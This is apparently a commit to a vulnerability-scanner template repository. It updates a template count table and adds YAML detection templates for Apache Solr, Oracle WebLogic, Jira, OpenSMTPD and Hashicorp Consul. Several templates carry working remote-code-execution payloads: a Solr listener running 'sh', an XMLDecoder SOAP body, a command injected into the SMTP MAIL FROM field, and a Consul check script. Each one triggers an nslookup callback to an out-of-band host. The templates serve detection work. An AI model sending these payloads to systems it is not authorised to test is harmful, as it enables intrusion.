Noam Rathaus 2021-05-05 08:46:32 +03:00
commit a094b38f83
6 changed files with 158 additions and 7 deletions

View File

@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts | | Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 302 | vulnerabilities | 144 | exposed-panels | 124 | | cves | 305 | vulnerabilities | 145 | exposed-panels | 124 |
| takeovers | 68 | exposures | 91 | technologies | 66 | | takeovers | 68 | exposures | 91 | technologies | 66 |
| misconfiguration | 57 | workflows | 30 | miscellaneous | 20 | | misconfiguration | 57 | workflows | 30 | miscellaneous | 20 |
| default-logins | 24 | exposed-tokens | 0 | dns | 8 | | default-logins | 24 | exposed-tokens | 0 | dns | 8 |
| fuzzing | 8 | helpers | 8 | iot | 11 | | fuzzing | 8 | helpers | 8 | iot | 11 |
**102 directories, 1045 files**. **102 directories, 1049 files**.
</td> </td>
</tr> </tr>

View File

@ -0,0 +1,26 @@
id: CVE-2017-12629
info:
name: Apache Solr <= 7.1 Remote Code Execution via SSRF
author: dwisiswant0
severity: critical
tags: cve,cve2017,solr,apache,rce,ssrf,oob
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2017-12629
- https://twitter.com/honoki/status/1298636315613974532/photo/1
requests:
- raw:
- |
GET /solr/select?qt=%2Fconfig%2523%26&shards=127.0.0.1:8984/solq&stream.body=%7B%22add-listener%22%3A%7B%22event%22%3A%22postCommit%22%2C%22name%22%3A%22nuclei%22%2C%22class%22%3A%22solr.RunExecutableListener%22%2C%22exe%22%3A%22sh%22%2C%22dir%22%3A%22%2Fbin%2F%22%2C%22args%22%3A%5B%22-c%22%2C%22%24%40%7Csh%22%2C%22.%22%2C%22echo%22%2C%22nslookup%22%2C%22%24%28whoami%29.{{interactsh-url}}%22%5D%7D%7D&wt=json&isShard=true&q=apple HTTP/1.1
Host: {{Hostname}}
- |
GET /solr/select?shards=127.0.0.1:8984/solr/update%23&commit=true HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"

View File

@ -0,0 +1,44 @@
id: CVE-2017-3506
info:
name: Oracle Weblogic Remote OS Command Execution
author: pdteam
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
severity: high
tags: cve,cve2017,weblogic,oracle,rce,oob
reference: |
- https://hackerone.com/reports/810778
- https://nvd.nist.gov/vuln/detail/CVE-2017-3506
requests:
- raw:
- |
POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0,
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
Content-Type: text/xml;charset=UTF-8
Content-Length: 873
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>http://{{interactsh-url}}</string>
</void>
<void idref="url">
<void id="stream" method ="openStream"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"

View File

@ -12,11 +12,18 @@ info:
tags: cve,cve2017,atlassian,jira,ssrf tags: cve,cve2017,atlassian,jira,ssrf
requests: requests:
- method: GET - raw:
path: - |
- "{{BaseURL}}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json" GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
matchers: matchers:
- type: word - type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words: words:
- "ipinfo.io/missingauth" - "http"
part: body

View File

@ -0,0 +1,38 @@
id: CVE-2020-7247
info:
name: OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution
author: princechaddha
severity: critical
reference: https://www.openwall.com/lists/oss-security/2020/01/28/3
tags: cve,cve2020,smtp,opensmtpd,network,rce
network:
- inputs:
- read: 1024
- data: "helo target\r\n"
read: 1024
- data: "MAIL FROM:<;nslookup {{interactsh-url}};>\r\n"
read: 1024
- data: "RCPT TO:<root>\r\n"
read: 1024
- data: "DATA\r\n"
read: 1024
- data: "\r\nxxxx\r\n.\r\n"
read: 1024
- data: "QUIT\r\n"
read: 1024
host:
- "{{Hostname}}"
- "{{Hostname}}:25"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: raw
words:
- "Message accepted for delivery"

View File

@ -0,0 +1,36 @@
id: hashicorp-consul-rce
info:
name: Hashicorp Consul Services Api RCE
author: pikpikcu
severity: critical
reference: https://www.exploit-db.com/exploits/46074
tags: hashicorp,rce,oob
requests:
- raw:
- | # Create USER
PUT /v1/agent/service/register HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 205
{
"ID": "{{randstr}}",
"Name": "{{randstr}}",
"Address": "127.0.0.1",
"Port": 80,
"check": {
"script": "nslookup {{interactsh-url}}",
"interval": "10s",
"Timeout": "86400s"
}
}
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"